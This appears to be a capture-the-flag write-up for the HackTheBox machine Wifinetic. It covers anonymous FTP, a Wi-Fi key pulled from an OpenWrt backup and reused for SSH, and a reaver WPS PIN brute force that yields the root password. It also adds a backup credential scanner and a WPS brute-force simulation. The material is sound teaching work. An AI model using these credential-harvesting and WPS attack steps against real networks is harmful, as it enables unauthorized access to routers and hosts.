Service overview

The machine has the IP address 10.10.11.247. Let's start with a standard nmap port scan:

$ nmap -sV -sC -Pn -oN 10.10.11.247 10.10.11.247 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 05:11 EDT
Nmap scan report for 10.10.11.247
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE    VERSION
21/tcp open  ftp        vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r--    1 ftp      ftp       2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r--    1 ftp      ftp         60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r--    1 ftp      ftp         40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r--    1 ftp      ftp         52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open  tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.42 seconds

Atypical for Linux machines on HackTheBox: the FTP port is open, and nmap's ftp-anon script already reports that anonymous login is allowed and lists the files. Port 53 is reported only as tcpwrapped (the connection was accepted and closed without a banner), so there is nothing to work with there for now.

FTP

Let's check what is on the FTP server.

$ ftp 10.10.11.247                    
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Anonymous login is allowed. Let's look at the available files:

ftp> ls
229 Entering Extended Passive Mode (|||46320|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r--    1 ftp      ftp       2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r--    1 ftp      ftp         60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r--    1 ftp      ftp         40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r--    1 ftp      ftp         52946 Jul 31 11:03 employees_wellness.pdf
226 Directory send OK.

Let's download them to our machine.

ftp> get MigrateOpenWrt.txt
ftp> get ProjectGreatMigration.pdf
ftp> get ProjectOpenWRT.pdf
ftp> get backup-OpenWrt-2023-07-26.tar
ftp> get employees_wellness.pdf

Let's unpack the OpenWrt backup.

$ tar xvf backup-OpenWrt-2023-07-26.tar

Unpacking yields a copy of the router's /etc directory. That gives us a username that may also exist on the target machine:

$ cat etc/passwd
...
netadmin:x:999:999::/home/netadmin:/bin/false

We also find the Wi-Fi key of the access point:

$ cat etc/config/wireless 
...
config wifi-iface 'wifinet0'
        option device 'radio0'
        option mode 'ap'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
        option wps_pushbutton '1'

config wifi-iface 'wifinet1'
        option device 'radio1'
        option mode 'sta'
        option network 'wwan'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
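A backup of /etc is worth scanning systematically rather than eyeballing two files. The script below is an added example, not part of the original write-up or of OpenWrt: it parses the UCI syntax used by /etc/config/*, flags options that usually hold credentials (the option-name list is our own assumption), and pulls accounts from etc/passwd and usable hashes from etc/shadow straight out of the tarball in memory. The sample archive it builds is constructed inline to mirror the structure of the backup above; it is not the real archive, and the root hash in it is made up.

```python
import io
import re
import tarfile

# Option names that usually carry credentials in /etc/config/* (our own list,
# not something OpenWrt defines).
SECRET_OPTIONS = {"key", "password", "passwd", "secret", "psk", "auth_secret"}
# UCI tokens: single-quoted, double-quoted or bare.
_TOKEN = re.compile(r"""'([^']*)'|"([^"]*)"|(\S+)""")


def parse_uci(text):
    """Minimal UCI parser -> list of (type, name_or_None, options).
    `option k v` stores a string, `list k v` appends to a list."""
    sections, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = ["".join(m) for m in _TOKEN.findall(line)]
        if parts[0] == "config" and len(parts) >= 2:
            current = (parts[1], parts[2] if len(parts) > 2 else None, {})
            sections.append(current)
        elif parts[0] in ("option", "list") and current and len(parts) >= 2:
            key, val = parts[1], parts[2] if len(parts) > 2 else ""
            if parts[0] == "list":
                current[2].setdefault(key, []).append(val)
            else:
                current[2][key] = val
    return sections


def find_secrets(sections, path):
    """(path, section, option, value) for every secret-looking string option."""
    hits = []
    for sec_type, name, opts in sections:
        label = f"{sec_type}.{name}" if name else sec_type
        for key, val in opts.items():
            if key.lower() in SECRET_OPTIONS and isinstance(val, str) and val:
                hits.append((path, label, key, val))
    return hits


def scan_backup(tar_bytes):
    """Walk an OpenWrt backup tarball held in memory. Collects UCI secrets,
    every passwd account as (name, uid, shell) and shadow hashes that are
    neither empty nor locked ('*' / '!')."""
    out = {"uci_secrets": [], "users": [], "hashes": []}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf.getmembers():
            if not m.isfile():
                continue
            name = m.name[2:] if m.name.startswith("./") else m.name.lstrip("/")
            data = tf.extractfile(m).read().decode("utf-8", "replace")
            if name.startswith("etc/config/"):
                out["uci_secrets"] += find_secrets(parse_uci(data), name)
            elif name == "etc/passwd":
                for f in (l.split(":") for l in data.splitlines()):
                    if len(f) >= 7:
                        out["users"].append((f[0], f[2], f[6]))
            elif name == "etc/shadow":
                for f in (l.split(":") for l in data.splitlines()):
                    if len(f) >= 2 and f[1] and not f[1].startswith(("*", "!")):
                        out["hashes"].append((f[0], f[1]))
    return out


def build_sample_backup():
    """Constructed sample (not the archive from the box): a wireless config
    shaped like the one above plus passwd/shadow with a made-up root hash."""
    files = {
        "./etc/config/wireless": (
            "config wifi-iface 'wifinet0'\n"
            "\toption device 'radio0'\n"
            "\toption mode 'ap'\n"
            "\toption ssid 'OpenWrt'\n"
            "\toption encryption 'psk'\n"
            "\toption key 'VeRyUniUqWiFIPasswrd1!'\n"
            "\toption wps_pushbutton '1'\n\n"
            "config wifi-iface 'wifinet1'\n"
            "\toption mode 'sta'\n"
            "\toption ssid 'OpenWrt'\n"
            "\toption key 'VeRyUniUqWiFIPasswrd1!'\n"
        ),
        # On the router the account has no shell; the name still matters,
        # because the same account may exist elsewhere with a shell.
        "./etc/passwd": "root:x:0:0:root:/root:/bin/ash\n"
                        "netadmin:x:999:999::/home/netadmin:/bin/false\n",
        "./etc/shadow": "root:$1$constructed$notarealhash:19500:0:99999:7:::\n"
                        "netadmin:*:0:0:99999:7:::\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for path, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for kind, items in scan_backup(build_sample_backup()).items():
        for item in items:
            print(kind, *item)
```

Run it against the real backup with `scan_backup(open("backup-OpenWrt-2023-07-26.tar", "rb").read())`. Note that netadmin has /bin/false on the router; the account name is still the useful finding, because the same name turns out to exist on the Ubuntu host with a real shell.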

Let's try these credentials over SSH, in case the Wi-Fi key is reused as the password of the netadmin account:

$ ssh netadmin@10.10.11.247
VeRyUniUqWiFIPasswrd1!


User flag

netadmin@wifinetic:~$ ls -la
total 44
drwxr-xr-x  5 netadmin netadmin 4096 Sep 17 08:49 .
drwxr-xr-x 24 root     root     4096 Sep 11 16:58 ..
lrwxrwxrwx  1 root     root        9 Sep 11 16:08 .bash_history -> /dev/null
-rw-r--r--  1 netadmin netadmin  220 Feb 25  2020 .bash_logout
-rw-r--r--  1 netadmin netadmin 3771 Feb 25  2020 .bashrc
drwx------  2 netadmin netadmin 4096 Sep 11 16:40 .cache
drwx------  3 netadmin netadmin 4096 Sep 17 08:49 .config
drwx------  3 netadmin netadmin 4096 Sep 17 04:16 .gnupg
-rw-------  1 netadmin netadmin   38 Sep 17 03:48 .lesshst
-rw-r--r--  1 netadmin netadmin  807 Feb 25  2020 .profile
-rw-r-----  1 root     netadmin   33 Sep 17 02:40 user.txt
-rw-------  1 netadmin netadmin  831 Sep 17 04:04 .viminfo
netadmin@wifinetic:~$ cat user.txt 
abb0437cd64e2c419b080bb0a36e1488


Privilege escalation

Looking at the network interfaces, we find several wireless interfaces:

$ ip a
...
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.1/24 brd 192.168.1.255 scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::ff:fe00:0/64 scope link 
       valid_lft forever preferred_lft forever
4: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.23/24 brd 192.168.1.255 scope global dynamic wlan1
       valid_lft 19097sec preferred_lft 19097sec
    inet6 fe80::ff:fe00:100/64 scope link 
       valid_lft forever preferred_lft forever
5: wlan2: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
6: hwsim0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ieee802.11/radiotap 12:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
7: mon0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000
    link/ieee802.11/radiotap 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff

Let's check which mode each of them is in:

$ iwconfig
eth0      no wireless extensions.

wlan2     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
mon0      IEEE 802.11  Mode:Monitor  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
wlan1     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
hwsim0    no wireless extensions.

wlan0     IEEE 802.11  Mode:Master  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
lo        no wireless extensions.

wlan0 is in Master mode, i.e. it is the access point to which other clients connect, and its MAC address 02:00:00:00:00:00 is the BSSID we will target. mon0 is a monitor-mode interface, and wlan1/wlan2 are managed-mode stations.

We can try to brute-force the WPS PIN: the backup config shows WPS enabled on wifinet0 (option wps_pushbutton '1'). Conveniently, reaver is already installed on the machine, so we'll use it:

$ reaver -i wlan0 -b 02:00:00:00:00:00 -v

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[X] ERROR: pcap_activate status -1
[X] PCAP: generic error code
couldn't get pcap handle, exiting

On wlan0 reaver cannot get a pcap handle (the interface is the AP itself, in Master mode, while reaver needs a monitor-mode interface to send and capture raw 802.11 frames). Let's try the same against mon0, which iwconfig showed in Monitor mode.

$ reaver -i mon0 -b 02:00:00:00:00:00 -v

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[!] Found packet with bad FCS, skipping…
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'

The PIN turned out to be 12345670, the very first candidate reaver tries by default, so the attack finished on the first attempt. Along with the PIN, the AP handed over the WPA PSK: WhatIsRealAnDWhAtIsNot51121!.
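Why a WPS PIN falls so quickly: it is 8 digits, the last of which is a checksum, and the registrar exchange leaks the two halves separately (NACK after M4 if the first four digits are wrong, NACK after M6 if the next three are wrong), so the search space is 10^4 + 10^3 = 11,000 PINs instead of 10^7. The code below is an added example, not from the write-up or from reaver: FakeRegistrar is a constructed stand-in for the access point side of the exchange, brute_force follows reaver's default order (12345670 first, as seen in the output above, then sequential), and nothing here touches a radio.

```python
def wps_checksum(first_seven: int) -> int:
    """Checksum digit appended to a 7-digit WPS PIN: weights 3,1,3,1,... from
    the right, result is what brings the sum to a multiple of 10."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def make_pin(p1: str, p2: str) -> str:
    """Assemble an 8-digit PIN from the 4-digit and 3-digit halves."""
    return p1 + p2 + str(wps_checksum(int(p1 + p2)))


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class FakeRegistrar:
    """Constructed stand-in for the AP side of the WPS PIN exchange."""

    def __init__(self, pin: str, psk: str):
        assert is_valid_pin(pin)
        self.pin, self.psk, self.exchanges = pin, psk, 0

    def try_pin(self, pin: str):
        """One M1..M7 exchange. Returns (status, psk_or_None)."""
        self.exchanges += 1
        if not is_valid_pin(pin):
            return "malformed", None
        if pin[:4] != self.pin[:4]:
            return "bad_first", None     # NACK after M4: first half leaks
        if pin[4:7] != self.pin[4:7]:
            return "bad_second", None    # NACK after M6: second half leaks
        return "ok", self.psk            # M7 carries the WPA PSK


def brute_force(registrar):
    """Split brute force in reaver's default order (12345670 first, then
    sequential). Returns (pin, psk, exchanges_used) or (None, None, n)."""
    p1_order = ["1234"] + [f"{i:04d}" for i in range(10000) if i != 1234]
    p2_order = ["567"] + [f"{i:03d}" for i in range(1000) if i != 567]
    n = 0
    found_p1 = None
    for p1 in p1_order:                  # phase 1: at most 10,000 exchanges
        n += 1
        status, psk = registrar.try_pin(make_pin(p1, p2_order[0]))
        if status == "ok":
            return make_pin(p1, p2_order[0]), psk, n
        if status == "bad_second":       # first half confirmed, keep it
            found_p1 = p1
            break
    if found_p1 is None:
        return None, None, n
    for p2 in p2_order[1:]:              # phase 2: at most 999 more
        n += 1
        pin = make_pin(found_p1, p2)
        status, psk = registrar.try_pin(pin)
        if status == "ok":
            return pin, psk, n
    return None, None, n


if __name__ == "__main__":
    ap = FakeRegistrar("12345670", "WhatIsRealAnDWhAtIsNot51121!")
    print(brute_force(ap))                                    # found on exchange 1
    print(brute_force(FakeRegistrar("99999995", "worst")))    # worst case: 10999
```

Against a real AP the bottleneck is not the 11,000 exchanges but lockout: most firmware disables WPS for a while after a handful of failed PINs, which is why reaver has delay options, and why leaving WPS enabled at all is the actual misconfiguration here.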

Let's try this password as the root password, betting on password reuse once more:

$ su
WhatIsRealAnDWhAtIsNot51121!


Root flag

root@wifinetic:/tmp# cd /root/
root@wifinetic:~# cat root.txt 
0cd2983e7be4c391d7077f029f3bead5
